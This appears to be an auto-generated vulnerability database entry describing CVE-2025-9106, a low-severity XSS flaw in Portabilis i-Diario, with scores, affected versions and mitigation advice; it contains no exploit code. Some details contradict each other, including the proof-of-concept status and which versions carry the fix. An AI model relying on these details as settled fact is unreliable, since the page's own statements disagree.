LOWCVE-2025-9106CVSS 3.5

CVE-2025-9106: XSS in Portabilis i-Diario

Platform

php

Fixed in

1.0.1

1.1.1

1.2.1

1.3.1

1.4.1

1.5.1

AI Confidence: highNVDEPSS 0.0%Reviewed: May 2026

View on NVD

Save

CVE-2025-9106 describes a cross-site scripting (XSS) vulnerability discovered in Portabilis i-Diario versions 1.0 through 1.5.0. This flaw allows an attacker to inject malicious scripts into the application, potentially compromising user sessions and data. A fix is available in version 1.5.1, and the vulnerability details have been publicly disclosed.

Impact and Attack Scenarios

The XSS vulnerability in i-Diario allows an attacker to execute arbitrary JavaScript code within the context of a user's browser session. This can lead to various malicious actions, including stealing session cookies, redirecting users to phishing sites, or defacing the application's interface. Given the nature of i-Diario as a potentially sensitive educational management system, successful exploitation could expose student data, instructor information, and curriculum details. The public availability of an exploit significantly increases the risk of widespread attacks targeting vulnerable installations.

Exploitation Context

The vulnerability details and a proof-of-concept exploit have been publicly disclosed, indicating a heightened risk of exploitation. The CVSS score of 3.5 (LOW) suggests that while the vulnerability exists, the attack conditions may be somewhat limited or require specific user interaction. It is not currently listed on CISA KEV, but the public exploit warrants close monitoring.

Threat Intelligence

Exploit Status

Proof of ConceptUnknown

CISA KEVNO

Internet ExposureHigh

NextGuard10–15% still vulnerable

EPSS

0.04% (11% percentile)

CISA SSVC

Exploitationpoc

Automatableno

Technical Impact

Affected Software

VendorPortabilis

Affected rangeFixed in

1.0 – 1.01.0.1

1.1 – 1.11.1.1

1.2 – 1.21.2.1

1.3 – 1.31.3.1

1.4 – 1.41.4.1

1.5.0 – 1.5.01.5.1

Weakness Classification (CWE)

CWE-79 CWE-94

Timeline

Reserved2025-08-17
Published2025-08-18
EPSS updated2026-03-23

Mitigation and Workarounds

The primary mitigation for CVE-2025-9106 is to upgrade to Portabilis i-Diario version 1.5.1 or later. If upgrading immediately is not feasible, consider implementing input validation and output encoding on the /planos-de-ensino-por-disciplina/ page to sanitize user-supplied data. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update security policies to prevent similar vulnerabilities in the future.

How to fix

Update i-Diario to a version later than 1.5.0 that fixes the XSS vulnerability. If no version is available, review and filter the inputs of the 'Parecer', 'Conteúdos' and 'Objetivos' fields in the /planos-de-ensino-por-disciplina/ file to prevent malicious code injection.

CVE Security Newsletter

Vulnerability analysis and critical alerts directly to your inbox.

Frequently asked questions

What is CVE-2025-9106 — XSS in Portabilis i-Diario?

CVE-2025-9106 is a cross-site scripting (XSS) vulnerability affecting Portabilis i-Diario versions 1.0 through 1.5.0, allowing attackers to inject malicious scripts.

Am I affected by CVE-2025-9106 in Portabilis i-Diario?

You are affected if you are using Portabilis i-Diario versions 1.0, 1.1, 1.2, 1.3, 1.4, or 1.5.0. Upgrade is required.

How do I fix CVE-2025-9106 in Portabilis i-Diario?

Upgrade to Portabilis i-Diario version 1.5.1 or later to resolve the vulnerability. Consider temporary WAF rules as an interim measure.

Is CVE-2025-9106 being actively exploited?

A public proof-of-concept exploit exists, indicating a potential for active exploitation. Monitor your systems closely.

Where can I find the official Portabilis advisory for CVE-2025-9106?

Refer to the Portabilis security advisories on their official website for the latest information and updates regarding CVE-2025-9106.